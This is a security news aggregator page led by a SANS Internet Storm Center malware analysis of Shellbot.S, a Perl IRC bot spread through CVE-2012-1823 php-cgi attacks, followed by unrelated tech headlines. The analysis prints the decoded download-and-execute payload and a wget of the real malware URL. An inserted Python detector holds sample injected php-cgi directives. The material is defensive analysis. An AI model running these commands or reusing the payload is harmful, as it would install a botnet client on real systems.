Hackin9

InfoSec News

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Software giant says it will release the fix soon even though it has seen few attempts to exploit the flaw.

 

In the oldie but goodie category, reader Jon Turner sent us a fun example of old school malfeasance this morning that I'll share for your review and tactical opportunities.
I let him speak for himself:
We've been getting pretty regularly pinged with attempts to exploit CVE-2012-1823. We're not vulnerable for a few different reasons, so I'd been ignoring it but I finally got around to pulling down a packet capture of the traffic and inspecting it. The attack attempts to disable a few security-related PHP configuration settings, disable Suhosin, and then pull down and execute a Perl script via a system call.
Though I think our attacker is a bot or script kiddie (they didn't bother to fingerprint the server and pass an attack for the right OS), the script is pretty interesting. Forefront detects it as Backdoor:Perl/Shellbot.S. There are sections of the code for joining an IRC channel for CC, performing port scans, and automatically exploiting other systems. It looks like more than one developer was involved in writing the exploit code.

Let's have a little fun and dig into Shellbot.S a bit.

As also described by Jon, the evil bits are still available at the URL in the base64-encoded instructions in the packets:
data=' ?'

If you're following along at home, use a sandboxed/isolated Linux VM that you can reset when finished.
Via your favorite base64 encoder/decoder (I like the HackBar Firefox add-on), decode the string above and you should end up with:
echo st4r7.system( perl php.jpg).7h33nd
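The request Jon describes carries its second stage as a base64-encoded PHP snippet in a form parameter, so a web-tier check can decode that parameter and look for the download-and-execute markers before anything runs. The following is an added example, not code from the diary or the bot; the parameter name `data` and the delimiters `st4r7`/`7h33nd` come from the page, the `-d` directive syntax is known from CVE-2012-1823 itself, and the sample requests are constructed.

```python
"""Flag CVE-2012-1823-style php-cgi requests that smuggle a base64-encoded
download-and-execute stage in a 'data' form parameter (added example)."""
import base64
import binascii
import re
from typing import Optional
from urllib.parse import parse_qs, unquote_plus

# Delimiters from the decoded payload on the page (they bracket the command
# output so the bot can cut it out of the HTTP response) plus generic
# download-and-execute keywords.
SUSPICIOUS = ("st4r7", "7h33nd", "system(", "exec(", "shell_exec(",
              "passthru(", "perl ", "wget ", "curl ")

def decode_data_param(body: str) -> Optional[str]:
    """Return the decoded 'data' form parameter, or None if absent/invalid."""
    values = parse_qs(body, keep_blank_values=True).get("data")
    if not values:
        return None
    # parse_qs turns an unencoded '+' into a space; undo that so raw base64
    # sent without percent-encoding still decodes.
    raw = values[0].replace(" ", "+")
    try:
        return base64.b64decode(raw, validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return None

def analyze_request(query: str, body: str) -> dict:
    """Return php-cgi '-d' directives injected via the query string
    (CVE-2012-1823) and suspicious markers in the decoded 'data' parameter."""
    directives = re.findall(r"-d\s+([A-Za-z_.]+)", unquote_plus(query))
    decoded = decode_data_param(body) or ""
    markers = [m for m in SUSPICIOUS if m in decoded]
    return {"directives": directives, "markers": markers,
            "malicious": bool(directives) or bool(markers)}

# Constructed samples: a stage modelled on the page's decoded payload, and a
# benign form post that also happens to carry a base64 'data' field.
_STAGE = 'echo "st4r7".system("perl php.jpg")."7h33nd";'
SAMPLE_ATTACK = ("-d+safe_mode%3Doff+-d+suhosin.simulation%3Don",
                 "data=" + base64.b64encode(_STAGE.encode()).decode())
SAMPLE_BENIGN = ("page=2", "data=" + base64.b64encode(b"hello world").decode())

if __name__ == "__main__":
    for q, b in (SAMPLE_ATTACK, SAMPLE_BENIGN):
        print(analyze_request(q, b))
```

A hit on the `-d` directive alone is worth alerting on, since php-cgi directives never belong in a legitimate query string.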

From my Ubuntu VM I conducted the following:

malman@ubuntu:~$ netstat -ano | grep ESTABLISHED
No results.

Went and wgot the bot code.
malman@ubuntu:~$ wget http://ckboot.altervista.org/php.jpg
--2012-07-11 13:47:41-- http://ckboot.altervista.org/php.jpg
Resolving ckboot.altervista.org... 178.63.21.200
Connecting to ckboot.altervista.org|178.63.21.200|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15728 (15K) [image/jpeg]
Saving to: `php.jpg'
100%[=========================================================================================] 15,728 27.1K/s in 0.6s
2012-07-11 13:47:51 (27.1 KB/s) - `php.jpg' saved [15728/15728]

Followed orders per the base64 instructions:
malman@ubuntu:~$ perl php.jpg

Now we have some results: instant IRC hookup.
malman@ubuntu:~$ netstat -ano | grep ESTABLISHED
tcp 0 0 192.168.45.132:33371 83.66.116.112:6667 ESTABLISHED off (0.00/0/0)

My Ubuntu VM was not running an SSH daemon; I didn't even have it installed.
But line 14 of the spreader
Yep, confirmed:
malman@ubuntu:~$ ps aux | grep sshd
malman 17940 96.3 0.2 6944 2592 pts/3 R 13:49 2:23 /usr/sbin/sshd

As Jon stated, in the code we see that the script:
1) Joins an IRC channel for CC
my @hostauth=("localhost");
my @canais=("#consola");

2) Performs port scans
@portas=(21,22,23,25,80,113,135,445,1025,5000,6660,6661,6662,6663,6665,6666,6667,6668,6669,7000,8080,8018);

sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");

3) Automatically exploits unpatched PHP opportunities and leverages Google for some heavy lifting.
Starting at line 209:
if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched INDEXU for ".$1." seconds.");

Starting at line 491:
my $query="www.google.com/search?q=";

$query.="&num=$n&start=$s";

while ($page =~ m/<a class=l href=\"?http:\/\/([^\"]+)\"?/g) {

A $funcarg params check also reveals that Shellbot.S included TCP, UDP, and HTTP flooding functionality.

There are references to this source code being reported to SecurityFocus as seen in attacks as far back as 2006.
But my favorite reference in this classic-come-lately?
# Spreader
# this 'spreader' code isnot mine, i dont know who coded it.
# update: well, i just fix0red this shit a bit.

Script kiddie indeed.
Keep those PHP apps and instances patched, folks.

Russ McRee | @holisticinfosec
 
Enterprises that use Internet services in Asia for branch office connectivity continue to report latency issues. We outline what enterprises must do to minimize Internet latency and optimize application performance.
 
The first batch of iPhone 5 handsets began shipping on Tuesday to people who ordered them online last week, according to FedEx tracking notices delivered the same day.
 
Like an aircraft black box, the new ioSafe N2 is built for vulnerable data that is stored and shared on a network.
 
Answering critics who said Google+ was among the walking dead, Google this week announced that it has some 100 million active users among the 400 million that have signed up for the social network that turned a year-old in June.
 
The National Institute of Standards and Technology (NIST) has released a final version of its risk assessment guidelines that can provide senior leaders and executives with the information they need to understand and make decisions about ...
 
The National Institute of Standards and Technology (NIST) will host a workshop at its Gaithersburg, Md., headquarters October 15 and 16, 2012, to discuss ways NIST can focus its work to help federal departments and agencies manage the ...
 
Twitter is getting a new look and it's looking a lot like Facebook.
 
Researchers from security vendor Damballa have identified malicious Internet traffic that they believe is generated by a new and elusive variant of the sophisticated TDL4 malware.
 
SonicWall AntiSpam & EMail Multiple HTML Injection and Cross Site Scripting Vulnerabilities
 

Data privacy issues present new data governance challenges
TechTarget
PHILADELPHIA – Many organizations lump information security and data privacy together, meaning infosec teams end up managing privacy issues by default. That's not necessarily a bad thing, according to one data privacy expert, but privacy comes with ...

 
Twitter announced several new features today, including new mobile versions and an updated profile page that features a header photo. Here's how you can upload one.
 
The online accounts of Virgin Mobile USA subscribers are vulnerable to brute force attacks because the company forces customers to use weak passwords on its website, according to a software developer.
 
RETIRED: Auxilium PetRatePro Multiple Input Validation Vulnerabilities
 
Asterisk CVE-2012-4737 Access Rule Remote Security Bypass Vulnerability
 

The cloud: transforming the role of the infosec professional
Infosecurity Magazine
Tools like the CSA's Cloud Controls Matrix, Howie continued, can be used by infosec professionals to judge their requirements against any provider it may be considering. “It's a way of improving transparency on how the services are run, operated and ...

 
Intel hopes security features from McAfee will help the company differentiate its mobile chips from its rivals', according to Intel's software chief Renee James.
 
Germany's cybersecurity agency is urging users to drop Internet Explorer and switch to a rival, like Chrome or Firefox, until Microsoft patches a new critical bug in its browser.
 
LG said its Optimus G smartphone with a fast quad-core processor and LTE service will go on sale in the U.S. in November.
 
Box has added nine data center locations around the globe, including three in the U.S., to provide a new Accelerator service that offers up to 10 times the throughput of its previous cloud storage offering.
 
Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability
 
NGS00265 Patch Notification: Symantec Messaging Gateway - Unauthenticated detailed version disclosure
 
NGS00263 Patch Notification: Symantec Messaging Gateway - Easy CSRF to add a backdoor-administrator
 
Apple's iPhone 5 smartphone will feature a larger screen, 4G LTE network and iOS update. Is the iPhone 5 likely to shake up the smartphone market?
 
Google has put Windows XP users in a tight spot by dropping support for Internet Explorer 8 (IE8), analysts said today.
 
The U.S. Court of Appeals for the Second Circuit has granted a stay in a 7-year-old copyright lawsuit filed by the Authors Guild over the Google Books scanning project.
 
The U.S. International Trade Commission voted to move forward with an investigation of alleged infringement of Motorola Mobility patents by Apple.
 
NGS00268 Patch Notification: Symantec Messaging Gateway Out-of-band stored XSS - delivered by email
 
NGS00267 Patch Notification: Symantec Messaging Gateway SSH with backdoor user account
 
APPLE-SA-2012-09-17-1 Apple Remote Desktop 3.5.3
 
Fortigate UTM WAF Appliance - Cross Site Vulnerabilities
 
A recent study by four UCLA computer science researchers documents what some wireless data customers have long suspected -- they can get charged for wireless data access they never received.
 
Three advocacy groups plan to file a formal complaint against AT&T, alleging the carrier is violating the U.S. Federal Communications Commission's net neutrality rules for blocking a video-conferencing application on Apple's iPhones and iPads.
 
Axis VoIP Manager v2.1.5.7 - Multiple Web Vulnerabilities
 
In a thorough investigation of the Flame trojan, researchers have discovered that Flame was only one of four different malware programs written by the same authors. One of the other trojans is currently in the wild and a fifth was apparently planned
 
RETIRED: NCMedia Sound Editor Pro 'MRUList201202.dat' File Local Stack Buffer Overflow Vulnerability
 
[security bulletin] HPSBMU02813 SSRT100712 rev.1 - HP Operations Orchestration, Remote Execution of Arbitrary Code
 
Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities
 
SonicWALL EMail Security 7.3.5 - Multiple Vulnerabilities
 
I have no doubt that the iPhone 5 is a great phone and will set sales records. It's just uninteresting. So uninteresting, in fact, that it's interesting.
 
Pakistan and Bangladesh have ordered a block on YouTube in their countries, in protest against Google's reluctance to block a controversial movie trailer that mocks the Prophet Muhammad on the video-sharing site.
 
Tyler and Cameron Winklevoss, best known for their epic legal battle with Mark Zuckerberg over ownership rights to Facebook, have reportedly invested $1 million in a new social network aimed at the financial community, called SumZero.
 
The 3.5.3 update to Apple's Remote Desktop application addresses a security problem when connecting to third-party VNC servers that could lead to information disclosure; the same problem was fixed in the 3.6.x branch last month
 
Samsung Electronics has started mass production of a new type of memory chip for mobile devices, LPDDR3, that will dramatically increase performance in future smartphones and tablets, it said Tuesday.
 
According to Coverity's Software Security Risk Report, few web companies carry out testing during development, with many declining to check for bugs prior to integration testing
 
Microsoft on Monday issued a security advisory that confirmed in-the-wild attacks are exploiting an unpatched bug in Internet Explorer. The software maker is working on a fix.
 
Google-owned Motorola Mobility launched its first smartphone with an Atom processor from Intel, the companies announced at an event in London on Tuesday.
 
Lenovo said it plans to acquire Stoneware, a small U.S.-based company specializing in cloud products for schools and governments, as part of the PC maker's strategy to bolster its cloud computing offerings.
 
Apple retained the top spot in a survey released Tuesday by the American Consumer Satisfaction Index, which also found that the tablet market is spurring PC makers to improve the quality of their products.
 
The extent of the critical vulnerability in Internet Explorer is greater than previously realised. Both Microsoft and Germany's BSI have now issued warnings, though their suggested solutions differ
 
Apple Remote Desktop CVE-2012-0681 Information Disclosure Vulnerability
 

Posted by InfoSec News on Sep 17

http://www.wired.com/threatlevel/2012/09/virgin-mobile/

By Ryan Singel
Threat Level
Wired.com
09.17.12

Virgin Mobile U.S. promises its customers that it uses “standard
industry practices” to protect its customers’ personal data -- but
according to a Silicon Valley web developer, any first-year coder can
bust into a subscriber’s account, see who they call and text, register a
different phone on the account and even purchase a new...
 

Posted by InfoSec News on Sep 17

http://www.clinical-innovation.com/index.php?option=com_articles&view=article&id=35162

By Beth Walsh
Clinical-Innovation.com
September 16, 2012

The Utah Health Exchange, a state insurance exchange whose development
started several years before the healthcare reform law mandated
exchanges, was recently hacked, with words garbled, headlines blurred
and some pages inaccessible.

The Salt Lake Tribune reported on the hacking and said the...
 

Posted by InfoSec News on Sep 17

http://arstechnica.com/security/2012/09/romanians-cop-to-10-million-hacking-spree/

By Dan Goodin
Ars Technica
Sept 17, 2012

Two Romanian men have admitted to participating in an international
conspiracy that hacked into credit-card payment terminals at more than
150 Subway restaurant franchises and stole data for more than 146,000
accounts. The heist, which spanned the years 2009 to 2011, racked up
more than $10 million in losses, federal...
 

Posted by InfoSec News on Sep 17

http://www.darkreading.com/advanced-threats/167901091/security/attacks-breaches/240007486/cyber-spying-flame-attackers-operated-on-8216-need-to-know-8217-basis.html

By Kelly Jackson Higgins
Dark Reading
Sept 17, 2012

New research published separately today by Kaspersky Lab and Symantec
and in conjunction with CERT-Bund/BSI, and the International
Telecommunications Union-IMPACT, shows that the sophisticated Flame
cyberespionage campaign dates...
 

Posted by InfoSec News on Sep 17

http://tech2.in.com/news/general/ankit-fadias-website-hacked-again/440652

[This most recent attack is the ninth defacement for the Defcon 2012
Security Charlatan Award winner and fifth this year for Ankit Fadia
http://securityerrata.org/errata/charlatan/ankit_fadia/ - WK]

By tech2 News Staff
17 Sep, 2012

Ankit Fadia is known as one of India’s first 'ethical hackers'. He has been
recognised by a number of software companies, and...
 